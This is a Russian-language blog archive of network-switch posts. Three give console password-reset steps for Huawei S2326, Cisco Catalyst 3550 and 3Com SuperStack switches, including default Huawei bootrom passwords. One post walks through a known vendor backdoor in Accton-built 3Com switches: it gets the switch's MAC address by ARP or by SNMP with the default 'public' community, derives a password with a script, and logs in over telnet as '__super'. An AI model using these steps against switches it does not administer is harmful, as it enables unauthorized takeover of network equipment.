Archive for switch

Сброс пароля Huawei/Quidway S2326 (S2326TP-EI)

// Март 13th, 2015 // 4 комментария » // Huawei(Quidway), recovery password, switch

huawei_s2326.jpg

  1. Подключить свитч консольным кабелем с настройками:
    скорость: 9600 бит/с
    бит данных: 8 (bits)
    четность: нет (no parity)
    стоповый бит: 1
    управление потоком: нет
  2. Выключить питание свитча
  3. В консоле должно появится:
    BIOS LOADING ...
    Copyright (c) 2008-2010 HUAWEI TECH CO., LTD.
    (Ver128, Aug 24 2010, 21:58:24)
    
    Press Ctrl+B to enter BOOTROM menu ...

    после этого нажимаем сочетание клавиш «Ctrl+B«.

  4. Свитч запросит пароль, обычно это www.huawei.com иногда встречается и huawei, еще бывает Admin@huawei.com (да, именно с большой буквы), недавно еще появился fib256sw
  5. После ввода пароля должно появится «BOOTROM MENU«.
    BOOTROM  MENU
    
    1. Boot with default mode
    2. Enter serial submenu
    3. Enter startup submenu
    4. Enter ethernet submenu
    5. Enter filesystem submenu
    6. Modify BOOTROM password
    7. Reboot
    
    Enter your choice(1-7):

    Нам нужно Enter filesystem submenu, нажимаем «5» и «Enter«.

  6. Попадаем в «FILESYSTEM SUBMENU«.
    FILESYSTEM SUBMENU
    
    1. Erase Flash
    2. Format flash
    3. Delete file from Flash
    4. Rename file from Flash
    5. Display Flash files
    6. Return to main menu
    
    Enter your choice(1-6):

    выбираем Delete file from Flash, нажимаем «3» и «Enter«.

  7. Выводится список файлов, которые есть на файловой системе:
    No. File Size(bytes)     Created Date       File Name
    =================================================================
    1:  28       bytes   Jan 01 2008 00:00:54   private-data.txt
    2:  836      bytes   Jan 01 2008 00:01:08   rr.dat
    3:  836      bytes   Jan 01 2008 00:01:12   rr.bak
    4:  571936   bytes   Jan 01 2008 00:06:34   s23_33_53-v100r005sph007.pat
    5:  12240    bytes   Jan 01 2008 00:06:58   $_patchstate_reboot
    6:  6463980  bytes   Jan 01 2008 00:24:26   S2300-V100R005C01SPC100.cc
    7:  12086    bytes   Jan 01 2008 00:07:05   config-sw.cfg
    
    BE CAREFUL!
    This may cause your system fail to start!
    Please choose the file you want to delete:

    Находим файл(ы) с расширением cfg, его имя нужно вписать в строку приглашения после «Please choose the file you want to delete:«. В моем случае это «config-sw.cfg«. Подтверждаем удаление файла «y«.

    Please choose the file you want to delete:  config-sw.cfg
    
    delete it? Yes or No(Y/N)y
    
    Deleting file ....done
  8. После удаления файла свит покажет меню «FILESYSTEM SUBMENU«. Нажать «6» и «Enter«.
  9. В меню «BOOTROM MENU«. Выбрать «7» (Reboot) и «Enter«. Свитч перезагрузится с конфигурацией по умолчанию.

Взлом пароля на свитче 3Com SuperStack 3 backdoor

// Июнь 17th, 2013 // No Comments » // 3Com, hack, recovery password, switch

Оказалось, что линейка свитчей 3Com SuperStack 3 (а еще и некоторые свитчи Dell, SMC, Foundry и EdgeCore) вовсе не 3Com, а Accton. В документации к бэкдору упоминаются модели 3Com 3812, 3Com 3870, Edgecore ES4649 и Dell PowerConnect 5224, я проводил эксперимент на 3Com 3226 и 3250.

Суть бэкдора в том, что производитель заложил возможность авторизоваться на свитче зная его мак, который скриптом можно превратить в пароль, естественно все работает только в том случаи если у вас есть доступ к свитчу по telnet/ssh или http.

Для начала начала, нужно раздобыть мак адрес, если свитч находится в одной L2 сети с вами достаточно сделать ping и посмотреть ARP таблицу, например так:

C:\>ping 10.28.28.28
Обмен пакетами с 10.28.28.28 по 32 байт:
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Ответ от 10.28.28.28: число байт=32 время<1мс TTL=64
Статистика Ping для 10.28.28.28:
    Пакетов: отправлено = 4, получено = 4, потеряно = 0 (0% потерь),
Приблизительное время приема-передачи в мс:
    Минимальное = 0мсек, Максимальное = 0 мсек, Среднее = 0 мсек

C:\>arp -a 10.28.28.28
Интерфейс: 10.28.28.28 --- 0x10005
  Адрес IP              Физический адрес      Тип
  10.28.28.28           00-12-a9-c9-ac-c0     динамический

Если свитч находится за маршрутизатором, можно попробовать достать его мак через протокол SNMP, если его администратор не отключил или не поменял комьюнити по умолчанию.

$ snmpget -v1 -c public 10.28.28.28 IF-MIB::ifPhysAddress.1001
IF-MIB::ifPhysAddress.1001 = STRING: 0:12:a9:c9:ac:c0

Скачать скрипт accton.pl
запустить скрипт и в качестве параметра указать мак, с разделителем «:»:

./accton.pl 00:12:a9:c9:ac:c0
BUvypQd!

вот собственно «BUvypQd!» и будет пароль.
Подключаемся к свитчю через telnet, вводим логин «__super» и пароль, который сгенерировал скрипт:

$ telnet 10.28.28.28
Trying 10.28.28.28...
Connected to 10.28.28.28.
Escape character is '^]'.
Login: __super
Password: BUvypQd!

Menu options: -----------3Com SuperStack 3 Switch 3226-------------------------
 bridge              - Administer bridge-wide parameters
 feature             - Administer system features
 gettingStarted      - Basic device configuration
 logout              - Logout of the Command Line Interface
 physicalInterface   - Administer physical interfaces
 protocol            - Administer protocols
 security            - Administer security
 system              - Administer system-level functions
 trafficManagement   - Administer traffic management

Type ? for help.
--------------------------------3Com 3226 (1)--------------------------------
Select menu option:

Ссылка на описание бэкдора http://www.exploit-db.com/exploits/14875/

Cisco Catalyst WS-C3550 сброс пароля (password recovery)

// Март 14th, 2013 // No Comments » // Cisco, recovery password, switch

WS-C3550-24PWR-SMI

  1. Подключить свитч консольным кабелем с настройками:
    скорость: 9600 бит/с
    бит данных: 8 (bits)
    четность: нет (no parity)
    стоповый бит: 1
    управление потоком: нет
  2. Выключить питание свитча
  3. Зажать кнопку Mode и включить питание
  4. Когда индикатор System перестанет моргать — отпустить кнопку Mode, на экране должно быть приглашение:
  5. Xmodem file system is available.
    The password-recovery mechanism is enabled.
    
    The system has been interrupted prior to initializing the
    flash filesystem.  The following commands will initialize
    the flash filesystem, and finish loading the operating
    system software:
    
        flash_init
        boot
    
    switch:
  6. Ввести команду flash_init для инициализации Flash памяти:
    switch: flash_init
    Initializing Flash...
    flashfs[0]: 91 files, 4 directories
    flashfs[0]: 0 orphaned files, 0 orphaned directories
    flashfs[0]: Total bytes: 15998976
    flashfs[0]: Bytes used: 8177152
    flashfs[0]: Bytes available: 7821824
    flashfs[0]: flashfs fsck took 19 seconds.
    ...done Initializing Flash.
    Boot Sector Filesystem (bs:) installed, fsid: 3
  7. Ввести команду load_helper для инициализации помощника, будет загружен первый из доступных образов:
    switch: load_helper
  8. Просмотреть содержимое Flash карты можно командой dir flash:
    switch: dir flash:
    Directory of flash:/
    
    2    -rwx  320       <date>               system_env_vars
    3    -rwx  2224      <date>               config-text.old
    5    -rwx  4968676   <date>               c3550-i5k2l2q3-mz.121-22.EA4.bin
    7    drwx  128       <date>               c3550-i5k2l2q3-mz.121-20.EA1
    6    -rwx  30        <date>               env_vars
    8    -rwx  2116      <date>               vlan.dat
    9    -rwx  4650      <date>               config-text
    11   -rwx  24        <date>               private-config.text
    7821824 bytes available (8177152 bytes used)
  9. Переименовать или удалить старый конфиг:
    switch: rename flash:config-text flash:config-text.backup
    switch: delete flash:config-text
    Are you sure you want to delete "flash:config-text" (y/n)?y
    File "flash:config-text" deleted
  10. Загрузить образ командой boot
    switch: boot
    Loading "flash:c3550-i5k2l2q3-mz.121-22.EA4.bin"...
    #############################

Свитч загрузится с пустой конфигурацией:

         --- System Configuration Dialog ---

Would you like to enter the initial configuration dialog? [yes/no]: n



Press RETURN to get started!


Switch>

(далее…)

Сброс пароля 3Com SUPERSTACK 3 3226 3250

// Сентябрь 15th, 2012 // 1 Comment » // 3Com, recovery password, switch

3com 3226Подключится стандартным консольным кабелем, в параметра порта установить скорость 19200 (в некоторых инструкциях встречается еще загадочная скорость 18600).
Дождаться загрузки, на запрос логина ответить «recover» и пароль «recover». Появится надпись с предложением перезагрузить свитч и счетчиком обратного отсчета, в течении 30 секунд свитч нужно перезагрузить.
После перезагрузки, должно появится:

Enter the new password for the Administrator:

введите новый пароль для логина admin.